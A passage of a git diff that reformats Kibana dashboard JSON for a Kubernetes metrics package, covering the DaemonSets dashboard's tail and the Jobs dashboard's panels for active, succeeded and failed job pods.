"aca3d51a-f0ea-4323-8a27-0f8fc1b122cd", - "title": "Replicas per DaemonSet [Metrics Kubernetes]", - "type": "lens", - "version": "8.10.2" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] DaemonSets", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-31T12:42:19.191Z", - "id": "kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013", - "managed": false, - "references": [ - { - "id": "metrics-*", - "name": "74f075ae-ea3e-40aa-a84c-2538a2195f6a:indexpattern-datasource-layer-e3bc5ca2-71af-4901-ae1c-82e383f83ae9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "74f075ae-ea3e-40aa-a84c-2538a2195f6a:d115572d-c1ae-4402-bd61-7f6aca621b17", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2f904623-cc34-4a48-afce-46fff964dbdf:indexpattern-datasource-layer-65cba563-57d3-468a-93b9-f22de872b5ff", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2f904623-cc34-4a48-afce-46fff964dbdf:9cc3aefb-f6ee-47ca-8e8b-a5e5e9f46a6a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e39b7173-1acf-4b60-9500-caa97eb5fabb:indexpattern-datasource-layer-bb896fbb-5e73-4bb9-922d-922562b1e71f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e39b7173-1acf-4b60-9500-caa97eb5fabb:1aacb9a8-18b0-46cb-a522-1cfac61e09ef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "08341473-695b-44de-8faa-8ca14a6031e1:indexpattern-datasource-layer-54d4cb18-d411-4a9b-a241-8ecc1f2efddd", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "08341473-695b-44de-8faa-8ca14a6031e1:29b0a3c9-8a78-4a42-bc09-60671675e57c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd:indexpattern-datasource-layer-14c12ba0-f1aa-48ac-98c4-111594e9244c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd:1ecf2434-25f0-454c-94cd-67a09297f08f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_0e42fece-4a2f-4b80-a57d-89eeec3d0d29:optionsListDataView", - "type": "index-pattern" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "Replicas per DaemonSet [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false }, - { - "id": "metrics-*", - "name": "controlGroup_cfe75517-e74e-43eb-9566-258234ad92e7:optionsListDataView", - "type": "index-pattern" + "gridData": { + "h": 16, + "i": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd", + "w": 48, + "x": 0, + "y": 11 }, - { - "id": "metrics-*", - "name": "controlGroup_274480d2-d432-486c-bce5-e88caa3d6b7a:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd", + "title": "Replicas per DaemonSet [Metrics Kubernetes]", + "type": "lens", + "version": "8.10.2" + } ], - "type": "dashboard", - "typeMigrationVersion": "8.9.0" + "timeRestore": false, + "title": "[Metrics Kubernetes] DaemonSets", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "74f075ae-ea3e-40aa-a84c-2538a2195f6a:indexpattern-datasource-layer-e3bc5ca2-71af-4901-ae1c-82e383f83ae9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "74f075ae-ea3e-40aa-a84c-2538a2195f6a:d115572d-c1ae-4402-bd61-7f6aca621b17", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2f904623-cc34-4a48-afce-46fff964dbdf:indexpattern-datasource-layer-65cba563-57d3-468a-93b9-f22de872b5ff", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2f904623-cc34-4a48-afce-46fff964dbdf:9cc3aefb-f6ee-47ca-8e8b-a5e5e9f46a6a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e39b7173-1acf-4b60-9500-caa97eb5fabb:indexpattern-datasource-layer-bb896fbb-5e73-4bb9-922d-922562b1e71f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e39b7173-1acf-4b60-9500-caa97eb5fabb:1aacb9a8-18b0-46cb-a522-1cfac61e09ef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "08341473-695b-44de-8faa-8ca14a6031e1:indexpattern-datasource-layer-54d4cb18-d411-4a9b-a241-8ecc1f2efddd", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "08341473-695b-44de-8faa-8ca14a6031e1:29b0a3c9-8a78-4a42-bc09-60671675e57c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd:indexpattern-datasource-layer-14c12ba0-f1aa-48ac-98c4-111594e9244c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd:1ecf2434-25f0-454c-94cd-67a09297f08f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_0e42fece-4a2f-4b80-a57d-89eeec3d0d29:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_cfe75517-e74e-43eb-9566-258234ad92e7:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_274480d2-d432-486c-bce5-e88caa3d6b7a:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013.json index 061abd60a35..f689e25d101 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013.json @@ -1,911 +1,919 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"f85be4a4-bc01-41a9-b566-442569777dd4\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"f85be4a4-bc01-41a9-b566-442569777dd4\",\"enhancements\":{}}},\"db907011-1eb3-4ed7-ab48-679727ee08f2\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"db907011-1eb3-4ed7-ab48-679727ee08f2\",\"enhancements\":{}}},\"0a0c6dd9-2a6f-4d7a-b4f7-1231987bc460\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.job.name\",\"title\":\"Job Name\",\"id\":\"0a0c6dd9-2a6f-4d7a-b4f7-1231987bc460\",\"enhancements\":{}}}}" - }, - "description": "Metrics about Jobs", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "id": "kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1MCwyXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "twoLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"f85be4a4-bc01-41a9-b566-442569777dd4\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"f85be4a4-bc01-41a9-b566-442569777dd4\",\"enhancements\":{}}},\"db907011-1eb3-4ed7-ab48-679727ee08f2\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"db907011-1eb3-4ed7-ab48-679727ee08f2\",\"enhancements\":{}}},\"0a0c6dd9-2a6f-4d7a-b4f7-1231987bc460\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.job.name\",\"title\":\"Job Name\",\"id\":\"0a0c6dd9-2a6f-4d7a-b4f7-1231987bc460\",\"enhancements\":{}}}}" + }, + "description": "Metrics about Jobs", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "gridData": { + "h": 4, + "i": "ce57bb14-ee8a-43ba-bb57-a6f815838500", + "w": 48, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false + "panelIndex": "ce57bb14-ee8a-43ba-bb57-a6f815838500", + "title": "Kubernetes Dashboards [Metrics Kubernetes]", + "type": "visualization", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9b261d2c-645a-4dca-9229-9d8c52e79b9f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e4408339-1fa7-47b3-bac9-d2e7945d989f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9b261d2c-645a-4dca-9229-9d8c52e79b9f": { + "columnOrder": [ + "d65fee9a-8196-4bcf-b80f-af8eae9974ea", + "3bd09ac0-4718-47e1-abb4-54cbcf502e63" + ], + "columns": { + "3bd09ac0-4718-47e1-abb4-54cbcf502e63": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.job.pods.active\": *" + }, + "isBucketed": false, + "label": "Active", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.job.pods.active" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "ce57bb14-ee8a-43ba-bb57-a6f815838500", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "ce57bb14-ee8a-43ba-bb57-a6f815838500", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.10.2" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9b261d2c-645a-4dca-9229-9d8c52e79b9f", - "type": "index-pattern" + "d65fee9a-8196-4bcf-b80f-af8eae9974ea": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.job.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "e4408339-1fa7-47b3-bac9-d2e7945d989f", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "9b261d2c-645a-4dca-9229-9d8c52e79b9f": { - "columnOrder": [ - "d65fee9a-8196-4bcf-b80f-af8eae9974ea", - "3bd09ac0-4718-47e1-abb4-54cbcf502e63" - ], - "columns": { - "3bd09ac0-4718-47e1-abb4-54cbcf502e63": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.job.pods.active\": *" - }, - "isBucketed": false, - "label": "Active", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.job.pods.active" - }, - "d65fee9a-8196-4bcf-b80f-af8eae9974ea": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.job.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.name" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "e4408339-1fa7-47b3-bac9-d2e7945d989f", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_job" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_job" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "d65fee9a-8196-4bcf-b80f-af8eae9974ea", - "collapseFn": "sum", - "layerId": "9b261d2c-645a-4dca-9229-9d8c52e79b9f", - "layerType": "data", - "metricAccessor": "3bd09ac0-4718-47e1-abb4-54cbcf502e63" - } - }, - "title": "Active Job Pods [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "65805e20-7bb7-43ef-99de-fc56c3de6af2", - "w": 14, - "x": 0, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "65805e20-7bb7-43ef-99de-fc56c3de6af2", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "e4408339-1fa7-47b3-bac9-d2e7945d989f", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_job" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_job" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "d65fee9a-8196-4bcf-b80f-af8eae9974ea", + "collapseFn": "sum", + "layerId": "9b261d2c-645a-4dca-9229-9d8c52e79b9f", + "layerType": "data", + "metricAccessor": "3bd09ac0-4718-47e1-abb4-54cbcf502e63" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8da4f091-8450-456a-8496-aab42ef0871a", - "type": "index-pattern" + "title": "Active Job Pods [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "65805e20-7bb7-43ef-99de-fc56c3de6af2", + "w": 14, + "x": 0, + "y": 4 + }, + "panelIndex": "65805e20-7bb7-43ef-99de-fc56c3de6af2", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8da4f091-8450-456a-8496-aab42ef0871a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "25697353-2613-4360-89cc-900c9e265a10", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8da4f091-8450-456a-8496-aab42ef0871a": { + "columnOrder": [ + "a7a7d706-d487-4ea4-ac4e-a52de432b629", + "8747afd9-3e1d-4da8-8f85-e3f526af747e" + ], + "columns": { + "8747afd9-3e1d-4da8-8f85-e3f526af747e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.job.pods.succeeded\": *" + }, + "isBucketed": false, + "label": "Succeeded", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.job.pods.succeeded" + }, + "a7a7d706-d487-4ea4-ac4e-a52de432b629": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.job.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "25697353-2613-4360-89cc-900c9e265a10", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "8da4f091-8450-456a-8496-aab42ef0871a": { - "columnOrder": [ - "a7a7d706-d487-4ea4-ac4e-a52de432b629", - "8747afd9-3e1d-4da8-8f85-e3f526af747e" - ], - "columns": { - "8747afd9-3e1d-4da8-8f85-e3f526af747e": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.job.pods.succeeded\": *" - }, - "isBucketed": false, - "label": "Succeeded", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.job.pods.succeeded" - }, - "a7a7d706-d487-4ea4-ac4e-a52de432b629": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.job.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.name" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "25697353-2613-4360-89cc-900c9e265a10", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_job" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_job" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "a7a7d706-d487-4ea4-ac4e-a52de432b629", - "collapseFn": "sum", - "layerId": "8da4f091-8450-456a-8496-aab42ef0871a", - "layerType": "data", - "metricAccessor": "8747afd9-3e1d-4da8-8f85-e3f526af747e" - } - }, - "title": "Succeeded Job Pods [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "9ecfd540-d36f-4869-836d-3dd704a6561f", - "w": 14, - "x": 17, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "9ecfd540-d36f-4869-836d-3dd704a6561f", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "25697353-2613-4360-89cc-900c9e265a10", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_job" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_job" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "a7a7d706-d487-4ea4-ac4e-a52de432b629", + "collapseFn": "sum", + "layerId": "8da4f091-8450-456a-8496-aab42ef0871a", + "layerType": "data", + "metricAccessor": "8747afd9-3e1d-4da8-8f85-e3f526af747e" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-81a3cd5d-50e5-4e31-b736-000de1673372", - "type": "index-pattern" + "title": "Succeeded Job Pods [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "9ecfd540-d36f-4869-836d-3dd704a6561f", + "w": 14, + "x": 17, + "y": 4 + }, + "panelIndex": "9ecfd540-d36f-4869-836d-3dd704a6561f", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-81a3cd5d-50e5-4e31-b736-000de1673372", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f5e0f998-307f-48b5-8a3d-a8ce10058dbd", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "81a3cd5d-50e5-4e31-b736-000de1673372": { + "columnOrder": [ + "d373cc02-b4ba-4cb3-a0b1-da41564d4a96", + "9fd1fc3c-2013-4d03-9107-b03512a8f7dd" + ], + "columns": { + "9fd1fc3c-2013-4d03-9107-b03512a8f7dd": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.job.pods.failed\": *" + }, + "isBucketed": false, + "label": "Failed", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.job.pods.failed" + }, + "d373cc02-b4ba-4cb3-a0b1-da41564d4a96": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.job.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "f5e0f998-307f-48b5-8a3d-a8ce10058dbd", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "81a3cd5d-50e5-4e31-b736-000de1673372": { - "columnOrder": [ - "d373cc02-b4ba-4cb3-a0b1-da41564d4a96", - "9fd1fc3c-2013-4d03-9107-b03512a8f7dd" - ], - "columns": { - "9fd1fc3c-2013-4d03-9107-b03512a8f7dd": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.job.pods.failed\": *" - }, - "isBucketed": false, - "label": "Failed", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.job.pods.failed" - }, - "d373cc02-b4ba-4cb3-a0b1-da41564d4a96": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.job.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.name" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "f5e0f998-307f-48b5-8a3d-a8ce10058dbd", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_job" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_job" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "d373cc02-b4ba-4cb3-a0b1-da41564d4a96", - "collapseFn": "sum", - "layerId": "81a3cd5d-50e5-4e31-b736-000de1673372", - "layerType": "data", - "metricAccessor": "9fd1fc3c-2013-4d03-9107-b03512a8f7dd" - } - }, - "title": "Failed Job Pods [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "c73b7420-ce63-4d11-b25e-387c7c76b9f1", - "w": 14, - "x": 34, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": 